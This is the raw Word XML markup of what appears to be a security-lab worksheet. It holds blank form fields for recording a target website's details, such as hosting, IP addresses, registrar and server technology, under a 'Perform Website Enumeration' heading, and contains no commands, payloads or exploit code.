            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A2A7D9F" w14:textId="77777777" w:rsidR="008F3EFB" w:rsidRDefault="008F3EFB" w:rsidP="008F3EFB">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48519244" w14:textId="7333ED7B" w:rsidR="00894386" w:rsidRPr="00894386" w:rsidRDefault="00894386" w:rsidP="008F3EFB">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00894386">
              <w:t>Site title</w:t>
            </w:r>
            <w:r>
              <w:t>: _____________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C650A80" w14:textId="197FEC95" w:rsidR="00894386" w:rsidRPr="00894386" w:rsidRDefault="00894386" w:rsidP="008F3EFB">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00894386">
              <w:t>Site rank</w:t>
            </w:r>
            <w:r>
              <w:t>: _____________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B50BB7F" w14:textId="1A42C167" w:rsidR="00894386" w:rsidRPr="00894386" w:rsidRDefault="00894386" w:rsidP="008F3EFB">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00894386">
              <w:t>Date first seen</w:t>
            </w:r>
            <w:r>
              <w:t>: ________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65C4680B" w14:textId="77777777" w:rsidR="00D62B99" w:rsidRDefault="00894386" w:rsidP="008F3EFB">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00894386">
              <w:t>Primary language</w:t>
            </w:r>
            <w:r>
              <w:t>: ______________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E171185" w14:textId="77777777" w:rsidR="00894386" w:rsidRDefault="00D708CE" w:rsidP="008F3EFB">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:bCs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Calibri" w:cs="Calibri"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Others (If any): </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36AEB751" w14:textId="0FD1673D" w:rsidR="00D708CE" w:rsidRPr="00D62B99" w:rsidRDefault="00D708CE" w:rsidP="00D708CE">
            <w:pPr>
              <w:spacing w:before="100" w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:bCs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D62B99" w:rsidRPr="00D62B99" w14:paraId="2334520F" w14:textId="77777777" w:rsidTr="00643A1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CAE69A3" w14:textId="3BF00965" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="003A639C" w:rsidP="00643A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A639C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Hosting History</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41F64CBC" w14:textId="77777777" w:rsidR="008F3EFB" w:rsidRDefault="008F3EFB" w:rsidP="0001401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D0D8B4E" w14:textId="4900E24C" w:rsidR="00014014" w:rsidRPr="00014014" w:rsidRDefault="00014014" w:rsidP="0001401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014014">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Web server IP address</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>: _____________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BA5E1EA" w14:textId="1C70F200" w:rsidR="00014014" w:rsidRPr="00014014" w:rsidRDefault="00014014" w:rsidP="0001401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014014">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Web server version</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>: ________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F07B95D" w14:textId="62DB51F5" w:rsidR="00D62B99" w:rsidRDefault="00014014" w:rsidP="0001401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014014">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Web server OS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>: ____________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B62A8B1" w14:textId="77777777" w:rsidR="00D708CE" w:rsidRDefault="00D708CE" w:rsidP="00D708CE">
            <w:pPr>
              <w:spacing w:before="100" w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:bCs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Calibri" w:cs="Calibri"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Others (If any): </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E9C74AA" w14:textId="77777777" w:rsidR="003A639C" w:rsidRPr="00D62B99" w:rsidRDefault="003A639C" w:rsidP="003A639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8498D" w:rsidRPr="00D62B99" w14:paraId="10A8FEE1" w14:textId="77777777" w:rsidTr="00643A1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07358B7" w14:textId="7F0321CF" w:rsidR="0018498D" w:rsidRPr="003A639C" w:rsidRDefault="0018498D" w:rsidP="00643A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8498D">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Network Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6514CEE0" w14:textId="5D38F22C" w:rsidR="00257F25" w:rsidRPr="00257F25" w:rsidRDefault="00257F25" w:rsidP="00257F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257F25">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>IP address</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>: _____________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A515A3D" w14:textId="5FF3459B" w:rsidR="00257F25" w:rsidRPr="00257F25" w:rsidRDefault="00257F25" w:rsidP="00257F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257F25">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>IPv6 address</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>: ___________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DFFC175" w14:textId="4800974C" w:rsidR="00257F25" w:rsidRPr="00257F25" w:rsidRDefault="00257F25" w:rsidP="00257F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257F25">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>IP geolocation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>: __________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67AD8389" w14:textId="52E96802" w:rsidR="00257F25" w:rsidRPr="00257F25" w:rsidRDefault="00257F25" w:rsidP="00257F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257F25">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Domain registrar</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>: ________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BFBB2F5" w14:textId="77777777" w:rsidR="0018498D" w:rsidRDefault="00257F25" w:rsidP="00257F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257F25">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Organization’s address</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>: ___________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2049A5A2" w14:textId="77777777" w:rsidR="00257F25" w:rsidRDefault="00257F25" w:rsidP="00257F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41BD5C9" w14:textId="77777777" w:rsidR="00257F25" w:rsidRDefault="00AC4023" w:rsidP="00257F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kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Others (If any): </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C059AF8" w14:textId="77777777" w:rsidR="00AC4023" w:rsidRDefault="00AC4023" w:rsidP="00257F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41F5267" w14:textId="5458D430" w:rsidR="00AC4023" w:rsidRDefault="00AC4023" w:rsidP="00257F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62B99" w:rsidRPr="00D62B99" w14:paraId="12FE9454" w14:textId="77777777" w:rsidTr="00643A1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A7EB926" w14:textId="77777777" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="00D62B99" w:rsidP="00643A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62B99">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Site Technology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F500878" w14:textId="1F8F886C" w:rsidR="00E47148" w:rsidRPr="00E47148" w:rsidRDefault="00E47148" w:rsidP="00E4714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E47148">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Server-side</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="008F3EFB">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>__________________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C61DFE6" w14:textId="68DAB349" w:rsidR="00E47148" w:rsidRPr="00E47148" w:rsidRDefault="00E47148" w:rsidP="00E4714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E47148">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Client-side</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="008F3EFB">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>___________________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01D76196" w14:textId="5801E599" w:rsidR="00E47148" w:rsidRPr="00E47148" w:rsidRDefault="00E47148" w:rsidP="00E4714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E47148">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Client-side scripting frameworks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="008F3EFB">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>_________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EC761AD" w14:textId="4EBF828B" w:rsidR="00E47148" w:rsidRPr="00E47148" w:rsidRDefault="00E47148" w:rsidP="00E4714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E47148">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Content delivery network</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="008F3EFB">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>______________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01FB0DCF" w14:textId="328FC465" w:rsidR="00E47148" w:rsidRPr="00E47148" w:rsidRDefault="00E47148" w:rsidP="00E4714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E47148">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Character encoding</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="008F3EFB">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>___________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="174D6E28" w14:textId="13937C57" w:rsidR="00E47148" w:rsidRPr="00E47148" w:rsidRDefault="00E47148" w:rsidP="00E4714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E47148">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>HTTP compression</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="008F3EFB">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>____________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18529DEF" w14:textId="68659981" w:rsidR="00D62B99" w:rsidRDefault="00E47148" w:rsidP="00E4714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E47148">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>SSL/TLS Security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="008F3EFB">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>______________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45B444EE" w14:textId="77777777" w:rsidR="008F3EFB" w:rsidRDefault="008F3EFB" w:rsidP="008F3EF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kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Others (If any): </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31C9A54A" w14:textId="77777777" w:rsidR="008F3EFB" w:rsidRDefault="008F3EFB" w:rsidP="00E4714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3DAFBE6" w14:textId="77777777" w:rsidR="00840A24" w:rsidRPr="00D62B99" w:rsidRDefault="00840A24" w:rsidP="00840A2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62B99" w:rsidRPr="00D62B99" w14:paraId="585710C6" w14:textId="77777777" w:rsidTr="00643A1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B8D11F6" w14:textId="77777777" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="00D62B99" w:rsidP="00643A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62B99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7DF6F416" w14:textId="77777777" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="00D62B99" w:rsidP="0084356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5FEFB83" w14:textId="77777777" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="00D62B99" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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2038C76" w14:textId="77777777" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="00D62B99" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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D30435C" w14:textId="77777777" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="00D62B99" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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F951EFA" w14:textId="77777777" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="00D62B99" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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6D22EB7" w14:textId="77777777" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="00D62B99" w:rsidP="00D62B9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316A46D3" w14:textId="77777777" w:rsidR="00BA013F" w:rsidRPr="00A51A96" w:rsidRDefault="00BA013F" w:rsidP="00BA013F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013F" w14:paraId="5F018B7E" w14:textId="77777777" w:rsidTr="008269B4">
        <w:trPr>
          <w:trHeight w:val="8387"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BB48D0E" w14:textId="77777777" w:rsidR="00BA013F" w:rsidRDefault="00BA013F" w:rsidP="00B63D59">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50B7A1B8" w14:textId="77777777" w:rsidR="00BA013F" w:rsidRDefault="00BA013F" w:rsidP="00B63D59">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="095BD696" w14:textId="77777777" w:rsidR="00BA013F" w:rsidRDefault="00BA013F" w:rsidP="00B63D59">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01332A16" w14:textId="77777777" w:rsidR="00BA013F" w:rsidRDefault="00BA013F" w:rsidP="00B63D59">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5DB7019A" w14:textId="77777777" w:rsidR="00BA013F" w:rsidRDefault="00BA013F" w:rsidP="00B63D59">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C587CA4" w14:textId="77777777" w:rsidR="00BA013F" w:rsidRDefault="00BA013F" w:rsidP="00B63D59">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E591602" w14:textId="77777777" w:rsidR="00BA013F" w:rsidRDefault="00BA013F" w:rsidP="00B63D59">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="07CE888E" w14:textId="77777777" w:rsidR="00BA013F" w:rsidRDefault="00BA013F" w:rsidP="00B63D59">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="16879F7C" w14:textId="77777777" w:rsidR="00BA013F" w:rsidRDefault="00BA013F" w:rsidP="00B63D59">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7875C64F" w14:textId="77777777" w:rsidR="00BA013F" w:rsidRDefault="00BA013F" w:rsidP="00B63D59">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="626F1CCE" w14:textId="77777777" w:rsidR="00BA013F" w:rsidRDefault="00BA013F" w:rsidP="00B63D59">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="45D3877C" w14:textId="77777777" w:rsidR="00BA013F" w:rsidRDefault="00BA013F" w:rsidP="00B63D59">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75900705" w14:textId="74F90793" w:rsidR="00E07D7D" w:rsidRDefault="00E07D7D" w:rsidP="00B63D59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A932D3" w:rsidRPr="00A51A96" w14:paraId="62338662" w14:textId="77777777" w:rsidTr="007A16D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="73D8E0C3" w14:textId="337FC8D7" w:rsidR="00A932D3" w:rsidRPr="006701F2" w:rsidRDefault="00A932D3" w:rsidP="0085194C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  <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Test 1.3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6701F2">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Perform Web</w:t>
            </w:r>
            <w:r w:rsidR="001A709F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>site</w:t>
            </w:r>
            <w:r w:rsidRPr="006701F2">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Enumeration </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10145705" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="007A16D1" w:rsidRDefault="00DB7128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7B7D85" w:rsidRPr="00D62B99" w14:paraId="27BF6BD0" w14:textId="77777777" w:rsidTr="008269B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BA1DD7A" w14:textId="77777777" w:rsidR="007B7D85" w:rsidRPr="00D62B99" w:rsidRDefault="007B7D85" w:rsidP="008269B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62B99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2BBA5E46" w14:textId="77777777" w:rsidR="007B7D85" w:rsidRPr="00D62B99" w:rsidRDefault="007B7D85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B7D85" w:rsidRPr="00D62B99" w14:paraId="323296B4" w14:textId="77777777" w:rsidTr="008269B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597CFDE" w14:textId="695F48DD" w:rsidR="007B7D85" w:rsidRPr="00D62B99" w:rsidRDefault="007B7D85" w:rsidP="008269B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Target </w:t>
            </w:r>
